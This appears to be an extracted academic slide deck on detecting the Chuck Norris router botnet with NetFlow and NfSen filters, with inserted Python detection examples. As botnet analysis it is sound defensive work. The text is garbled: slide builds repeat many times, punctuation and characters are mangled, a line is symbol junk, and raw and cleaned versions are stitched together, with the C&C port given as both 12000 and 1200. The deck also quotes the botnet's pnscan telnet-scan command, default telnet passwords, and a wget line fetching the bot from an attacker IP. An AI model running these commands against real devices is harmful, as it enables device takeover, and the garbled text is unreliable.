Identifies malware from NetFlow dataWatch whatrsquos happening inside the network 247Single purpose detection patterns (scanning botnets )Complex models of the network behavior
Even Chuck Norris Canrsquot Resist NetFlow Monitoring
Unusual worldwide TELNET scan attemptsMostly comming from ADSL connectionsNew botnet Chuck Norris discovered at December 2009Detailed analysis followed
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 7 28
Part II
Chuck Norris Botnet in a Nutshell
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 8 28
Chuck Norris Botnet
Linux malware ndash IRC bots with central CampC serversAttacks poorly-configured Linux MIPSEL devicesVulnerable devices ndash ADSL modems and routers
Uses TELNET brute force attack for infectionUsers are not aware about the malicious activitiesMissing anti-malware solution to detect it
Discovered at Masaryk University on 2 December 2009 The malware got the ChuckNorris moniker from a comment in its source code [R]anger Killato in nomedi Chuck Norris
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 9 28
Botnet Lifecycle
Scanning for vulnerable devices in predefined networksIP prefixes of ADSL networks of worldwide operatorsnetwork scanning ndash pnscan -n30 88102106024 23
Infection of a vulnerable deviceTELNET dictionary attack ndash 15 default passwordsadmin password root 1234 dreambox blank password
IRC bot initializationIRC bot download and execution on infected device wget http879816386pwnsyslgd
Botnet CampC operationsfurther bots spreading and CampC commands executionDNS spoofing and denial-of-service attacks
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 10 28
More about Chuck Norris Botnet
Chuck Norris botnet lifecycle in details and furtherinformation are available at the CYBER project page
httpwwwmuniczicscyberchuck_norris_botnet
3 wget scan-tools
webserver
2 Topic init-cmd (get scan-tools)
1 join soldiersCampC(IRC)serverSTOP
bot
stop remote access(ports 22-80)
infecteddevice
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 11 28
Part III
Botnet Detection Methods
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 12 28
Detection Methods Overview
Five Detection Methods
Telnet scan detectionConnections to botnet distribution sites detectionConnections to botnet CampC centers detectionDNS spoofing attack detectionADSL string detection
Methods Correspond to Botnet Lifecycle
Applied to NetFlow Data
Defined as NFDUMP filtersImplemented to NfSen collector
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 13 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
NFDUMP detection filter
(net local_network) and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
NFDUMP detection filter(net local_network)
and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
NFDUMP detection filter(net local_network)
and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP)
and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP)
and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
SYNRESET flags
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP) and
((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
NFDUMP detection filter(src net local_network) and (dst ip web_servers1)
and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP)
and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2)
and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP)
and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
NFDUMP detection filter
(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or
(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4))
and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
UDP53
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
ADSL String Detection
Looking for ADSL String
ADSL string indicates Chuck Norris botnetSearching in victimrsquos hostname or victimrsquos WHOISQuering DNS server and parsing recieved hostnameQuering WHOIS database and parsing recieved info
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 18 28
+
13131313
$amp()+--amp130+(amp0(131$2 13133+13133++ampamp45(331+605+70138913$13+-
amp3133+913($2-+(-amp3 lt$$2 2=gtlt$$21313913$+7013+-
1313130 $ 0$1
adsl
196192572
Detected Chuck Norris Servers
Known IP Addresses
Web server addresses 8798173190 879816386IRC server addresses 8798173190 879816386IRC server port 12000OpenDNS server addresses 2086722222220867220220Spoofed DNS server 879816386
This data is used in detection methods by default
IP addresses updates are published at project page
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 19 28
Part IV
NfSen Botnet Detection Plugin
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 20 28
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behaviorBased on NetFlow and other network data sourcesProcesses data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugins architecture recommendationsPHP frontend with a Perl backend and a PostgreSQL DBWeb e-mail and syslog detection output and reporting
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 21 28
Plugin Architecture
BACKEND FRONTEND
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
Part II
Chuck Norris Botnet in a Nutshell
Chuck Norris Botnet
Linux malware – IRC bots with central C&C servers
Attacks poorly-configured Linux MIPSEL devices
Vulnerable devices – ADSL modems and routers
Uses TELNET brute force attack for infection
Users are not aware of the malicious activities
Missing anti-malware solution to detect it
Discovered at Masaryk University on 2 December 2009. The malware got the Chuck Norris moniker from a comment in its source code: "[R]anger Killato: in nome di Chuck Norris" (Italian for "in the name of Chuck Norris").
Botnet Lifecycle
Scanning for vulnerable devices in predefined networks
  IP prefixes of ADSL networks of worldwide operators
  network scanning – pnscan -n30 88.102.106.0/24 23
Infection of a vulnerable device
  TELNET dictionary attack – 15 default passwords
  e.g. admin, password, root, 1234, dreambox, blank password
IRC bot initialization
  IRC bot download and execution on infected device: wget http://87.98.163.86/pwn/syslgd
Botnet C&C operations
  further bots spreading and C&C commands execution
  DNS spoofing and denial-of-service attacks
More about Chuck Norris Botnet
Chuck Norris botnet lifecycle in detail and further information are available at the CYBER project page:
http://www.muni.cz/ics/cyber/chuck_norris_botnet
[Diagram: the bot on the infected device (1) joins the soldiers channel on the C&C (IRC) server, (2) receives the channel topic init-cmd (get scan-tools), (3) wgets the scan-tools from the web server; the bot also stops remote access to the infected device (ports 22-80)]
Part III
Botnet Detection Methods
Detection Methods Overview
Five Detection Methods
Telnet scan detection
Connections to botnet distribution sites detection
Connections to botnet C&C centers detection
DNS spoofing attack detection
ADSL string detection
Methods Correspond to Botnet Lifecycle
Applied to NetFlow Data
Defined as NFDUMP filters
Implemented in the NfSen collector
Telnet Scan Detection – Phase I
Incoming and outgoing TCP SYN scans on port 23
[Diagram: an infected device in the local network sends TCP/23 probes with SYN or SYN/RESET flags to a list of C class networks to scan: 147.251.3.x, 147.251.18.x, 147.251.20.x, 147.251.4.x and others]
NFDUMP detection filter:
(net local_network) and (dst port 23) and (proto TCP) and ((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Connections to Botnet Distribution Sites – Phase II
Bot's web download requests from infected host
[Diagram: an infected device in the local network opens TCP/80 connections (SYN+ACK flags) to the botnet distribution web servers]
NFDUMP detection filter:
(src net local_network) and (dst ip web_servers [1]) and (dst port 80) and (proto TCP) and (flags SA and not flags R)
[1] IP addresses of attacker's botnet distribution web servers
Connections to Botnet C&C Center – Phase III
Bot's IRC traffic with command and control center
[Diagram: an infected device in the local network holds a TCP/1200 connection (SYN+ACK flags) to the botnet C&C server]
NFDUMP detection filter:
(src net local_network) and (dst ip IRC_server [2]) and (dst port 1200) and (proto TCP) and (flags SA and not flags R)
[2] IP address of the attacker's IRC server (botnet C&C center)
DNS Spoofing Attack Detection – Phase IV
Attacker's DNS or OpenDNS Queries
Common DNS requests forwarded to OpenDNS servers
Targeted DNS requests forwarded to attacker's spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
e.g. Facebook or banking sites
[Diagram: an infected device in the local network sends UDP/53 queries to an OpenDNS server and to the spoofed DNS server]
NFDUMP detection filter:
(src net local_network) and ((dst ip OpenDNS_servers [3]) or (dst ip DNS_servers [4])) and (proto UDP) and (dst port 53)
[3] IP addresses of the common OpenDNS servers
[4] IP addresses of the attacker's spoofed DNS servers
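The four flow-based filters of Phases I to IV, evaluated offline in Python as an added example that is not part of the slides or of the authors' NfSen plugin. It assumes a local network of 147.251.0.0/16 (the slides only name it local_network), takes the server addresses from the "Detected Chuck Norris Servers" slide, uses constructed flow records with 203.0.113.0/24 documentation addresses for the outside, and reads "not flags ARPUF" as "none of ACK, RST, PSH, URG, FIN set". The servers slide lists IRC port 12000 while the Phase III filter uses 1200, so the port is kept as a parameter.

```python
import ipaddress
from dataclasses import dataclass

# Assumption: the monitored local network (the slides only name it local_network)
LOCAL_NET = ipaddress.ip_network("147.251.0.0/16")

# Addresses from the "Detected Chuck Norris Servers" slide. That slide lists IRC
# port 12000 while the Phase III filter uses 1200, so the port stays a parameter.
WEB_SERVERS = {"87.98.173.190", "87.98.163.86"}
IRC_SERVERS = {"87.98.173.190", "87.98.163.86"}
IRC_PORT = 1200
OPENDNS_SERVERS = {"208.67.222.222", "208.67.220.220"}
SPOOFED_DNS_SERVERS = {"87.98.163.86"}


@dataclass(frozen=True)
class Flow:
    src: str
    dst: str
    proto: str   # "TCP" or "UDP"
    dport: int
    flags: str   # cumulative TCP flags of the flow as nfdump letters (S A R P U F)


def _in_local(ip):
    return ipaddress.ip_address(ip) in LOCAL_NET


def _flags(flow, required, forbidden):
    """True when all `required` flags are set and none of `forbidden` is.

    Reads "flags S and not flags ARPUF" as a bare SYN (no ACK/RST/PSH/URG/FIN);
    check the flag-matching semantics of your nfdump version before relying
    on the literal filter text.
    """
    present = set(flow.flags)
    return set(required) <= present and not (set(forbidden) & present)


def telnet_scan(flow):
    """Phase I: SYN or SYN/RST flows to TCP/23 entering or leaving the local net."""
    return ((_in_local(flow.src) or _in_local(flow.dst))
            and flow.proto == "TCP" and flow.dport == 23
            and (_flags(flow, "S", "ARPUF") or _flags(flow, "SR", "APUF")))


def distribution_site(flow):
    """Phase II: completed TCP/80 handshake to a botnet distribution web server."""
    return (_in_local(flow.src) and flow.dst in WEB_SERVERS
            and flow.proto == "TCP" and flow.dport == 80 and _flags(flow, "SA", "R"))


def cc_center(flow):
    """Phase III: completed handshake to the IRC C&C server on the C&C port."""
    return (_in_local(flow.src) and flow.dst in IRC_SERVERS
            and flow.proto == "TCP" and flow.dport == IRC_PORT and _flags(flow, "SA", "R"))


def dns_spoofing(flow):
    """Phase IV: UDP/53 queries from the local net to OpenDNS or the spoofed DNS."""
    return (_in_local(flow.src)
            and (flow.dst in OPENDNS_SERVERS or flow.dst in SPOOFED_DNS_SERVERS)
            and flow.proto == "UDP" and flow.dport == 53)


METHODS = {"telnet_scan": telnet_scan, "distribution_site": distribution_site,
           "cc_center": cc_center, "dns_spoofing": dns_spoofing}


def classify(flows):
    """Map each method name to the flows it matched, in input order."""
    hits = {name: [] for name in METHODS}
    for flow in flows:
        for name, method in METHODS.items():
            if method(flow):
                hits[name].append(flow)
    return hits


def suspects(flows):
    """Local hosts matched by more than one phase. One SYN to port 23 or one
    OpenDNS query is weak evidence; hits across phases follow the lifecycle."""
    phases = {}
    for name, matched in classify(flows).items():
        for flow in matched:
            host = flow.src if _in_local(flow.src) else flow.dst
            phases.setdefault(host, set()).add(name)
    return sorted(host for host, names in phases.items() if len(names) > 1)


# Constructed sample flows; 203.0.113.0/24 is the documentation range
SAMPLE_FLOWS = [
    Flow("147.251.3.10", "203.0.113.5", "TCP", 23, "S"),        # outgoing bare SYN
    Flow("203.0.113.7", "147.251.18.44", "TCP", 23, "SR"),      # incoming SYN/RST probe
    Flow("147.251.3.10", "203.0.113.5", "TCP", 23, "SAPF"),     # completed telnet session
    Flow("147.251.3.10", "87.98.163.86", "TCP", 80, "SAPF"),    # bot binary download
    Flow("147.251.3.10", "87.98.173.190", "TCP", 1200, "SA"),   # IRC C&C session
    Flow("147.251.3.10", "208.67.222.222", "UDP", 53, ""),      # query to OpenDNS
    Flow("147.251.20.5", "87.98.163.86", "UDP", 53, ""),        # query to spoofed DNS
    Flow("147.251.20.5", "87.98.163.86", "TCP", 80, "SR"),      # refused, no match
]

if __name__ == "__main__":
    for name, matched in classify(SAMPLE_FLOWS).items():
        print(f"{name}: {len(matched)} flow(s)")
    print("hosts matched by more than one phase:", suspects(SAMPLE_FLOWS))
```

In production the same logic is an nfdump filter run over the NfSen profile files; the point of the offline version is the flag handling (a bare SYN or SYN/RST probe versus a completed handshake) and the cross-phase correlation in suspects(), which keeps a single stray SYN to port 23 or one OpenDNS query from raising an alert on its own.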
ADSL String Detection
Looking for ADSL String
ADSL string indicates Chuck Norris botnet
Searching in victim's hostname or victim's WHOIS
Querying DNS server and parsing received hostname
Querying WHOIS database and parsing received info
[Screenshot: DNS and WHOIS lookup output for a victim IP address with the string "adsl" highlighted]
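The hostname and WHOIS checks described above, written out in Python as an added example that is not code from the slides or from the authors' plugin. The DNS and WHOIS lookups are passed in as callables so the check runs offline against the constructed records at the bottom (reserved example.net names and 203.0.113.0/24 addresses); the default resolver is the system PTR lookup, and the WHOIS field list is an assumption.

```python
import re
import socket
from typing import Callable, Optional

# Case-insensitive substring: providers write "adsl", "ADSL-POOL", "adsl-dyn" etc.
ADSL_RE = re.compile(r"adsl", re.IGNORECASE)

# Assumed set of descriptive WHOIS fields worth searching; remarks/comments are
# skipped so prose such as "no ADSL customers here" does not count as a hit.
WHOIS_FIELDS = ("netname", "descr", "org-name", "org", "role")


def reverse_lookup(ip: str) -> Optional[str]:
    """PTR lookup through the system resolver; None when no PTR record exists."""
    try:
        return socket.gethostbyaddr(ip)[0]
    except (socket.herror, socket.gaierror):
        return None


def adsl_in_hostname(hostname: Optional[str]) -> bool:
    return bool(hostname) and ADSL_RE.search(hostname) is not None


def adsl_in_whois(whois_text: str) -> list:
    """Return the 'field: value' lines whose value contains the ADSL string."""
    hits = []
    for line in whois_text.splitlines():
        if ":" not in line:
            continue
        field, _, value = line.partition(":")
        if field.strip().lower() in WHOIS_FIELDS and ADSL_RE.search(value):
            hits.append(line.strip())
    return hits


def check_host(ip: str,
               resolve: Callable[[str], Optional[str]] = reverse_lookup,
               whois: Optional[Callable[[str], Optional[str]]] = None) -> dict:
    """Run both checks for one address and report where the string was found."""
    hostname = resolve(ip)
    whois_text = (whois(ip) or "") if whois else ""
    whois_hits = adsl_in_whois(whois_text)
    return {
        "ip": ip,
        "hostname": hostname,
        "hostname_hit": adsl_in_hostname(hostname),
        "whois_hits": whois_hits,
        "adsl": adsl_in_hostname(hostname) or bool(whois_hits),
    }


# Constructed records standing in for real DNS and WHOIS answers
FAKE_PTR = {
    "203.0.113.10": "dyn-113-10.adsl.example.net",
    "203.0.113.20": "mail.example.net",
    "203.0.113.30": None,
}
FAKE_WHOIS = {
    "203.0.113.10": "inetnum: 203.0.113.0 - 203.0.113.255\n"
                    "netname: EXAMPLE-ADSL-POOL\n"
                    "descr: ADSL subscribers\n",
    "203.0.113.20": "netname: EXAMPLE-CORP\n"
                    "descr: Corporate mail servers\n"
                    "remarks: no ADSL customers here\n",
    "203.0.113.30": "netname: EXAMPLE-DSL\n"
                    "descr: residential dsl pool\n",
}


def check_sample(ip: str) -> dict:
    """Same check, wired to the constructed records above."""
    return check_host(ip, resolve=FAKE_PTR.get, whois=FAKE_WHOIS.get)


if __name__ == "__main__":
    for ip in FAKE_PTR:
        print(check_sample(ip))
```

The string on its own only says that the address sits in a consumer ADSL pool, which is why the plugin carries it as one of five methods: treat a hit as corroboration for hosts that a flow-based method has already flagged, not as a detection by itself.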
Detected Chuck Norris Servers
Known IP Addresses
Web server addresses: 87.98.173.190, 87.98.163.86
IRC server addresses: 87.98.173.190, 87.98.163.86
IRC server port: 12000
OpenDNS server addresses: 208.67.222.222, 208.67.220.220
Spoofed DNS server: 87.98.163.86
This data is used in the detection methods by default
IP address updates are published at the project page
Part IV
NfSen Botnet Detection Plugin
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behavior
Based on NetFlow and other network data sources
Processes data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugin architecture recommendations
PHP frontend with a Perl backend and a PostgreSQL DB
Web, e-mail and syslog detection output and reporting
Plugin Architecture
[Diagram: BACKEND – cndet.pm and cndetdb.pm (Perl), fed by NetFlow data, DNS and the WHOIS db and storing results in PostgreSQL; FRONTEND – cndet.php; backend and frontend communicate through the nfsend comm interface]
Plugin Methods Architecture
[Diagram: cndetdb.pm and PostgreSQL in the centre, with NetFlow data, DNS and the WHOIS db as inputs, and the five detection methods around them: Telnet scan detection, Botnet distribution sites detection, Botnet C&C centers detection, DNS spoofing attack detection, ADSL string detection]
Web Interface – Infected Host Detected
Part V
Conclusion
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible bots
infection of vulnerable devices
bot initialization/update
botnet operation
Botnet Detection Plugin Customization
modular plugin engine
easy modification for detection of other botnets
the detection methods need to be customized
plugin distributed under the BSD license
Conclusion
Network Devices Are Not Protected
Routers, access points, printers, cameras, TVs
No AV software, missing patches and firmware updates
But they should be protected
Experience
NetFlow can monitor all such devices in the network
Discovery of the new Chuck Norris botnet using NetFlow
Developed a specialized NfSen plugin for Chuck Norris botnet detection
Future
Chuck Norris is down but others are coming (e.g. Stuxnet)
We are open to research collaboration
Detection plugin is available at our project site
Thank You For Your Attention
Vojtěch Krmíček, Tomáš Plesník
{vojtec|plesnik}@ics.muni.cz
Project CYBER: http://www.muni.cz/ics/cyber
Detecting Botnets with NetFlow
This material is based upon work supported by the Czech Ministry of Defence under Contract No. OVMASUN200801
Chuck Norris Botnet
Linux malware ndash IRC bots with central CampC serversAttacks poorly-configured Linux MIPSEL devicesVulnerable devices ndash ADSL modems and routers
Uses TELNET brute force attack for infectionUsers are not aware about the malicious activitiesMissing anti-malware solution to detect it
Discovered at Masaryk University on 2 December 2009 The malware got the ChuckNorris moniker from a comment in its source code [R]anger Killato in nomedi Chuck Norris
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 9 28
Botnet Lifecycle
Scanning for vulnerable devices in predefined networksIP prefixes of ADSL networks of worldwide operatorsnetwork scanning ndash pnscan -n30 88102106024 23
Infection of a vulnerable deviceTELNET dictionary attack ndash 15 default passwordsadmin password root 1234 dreambox blank password
IRC bot initializationIRC bot download and execution on infected device wget http879816386pwnsyslgd
Botnet CampC operationsfurther bots spreading and CampC commands executionDNS spoofing and denial-of-service attacks
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 10 28
More about Chuck Norris Botnet
Chuck Norris botnet lifecycle in details and furtherinformation are available at the CYBER project page
httpwwwmuniczicscyberchuck_norris_botnet
3 wget scan-tools
webserver
2 Topic init-cmd (get scan-tools)
1 join soldiersCampC(IRC)serverSTOP
bot
stop remote access(ports 22-80)
infecteddevice
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 11 28
Part III
Botnet Detection Methods
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 12 28
Detection Methods Overview
Five Detection Methods
Telnet scan detectionConnections to botnet distribution sites detectionConnections to botnet CampC centers detectionDNS spoofing attack detectionADSL string detection
Methods Correspond to Botnet Lifecycle
Applied to NetFlow Data
Defined as NFDUMP filtersImplemented to NfSen collector
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 13 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
NFDUMP detection filter
(net local_network) and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
NFDUMP detection filter(net local_network)
and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
NFDUMP detection filter(net local_network)
and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
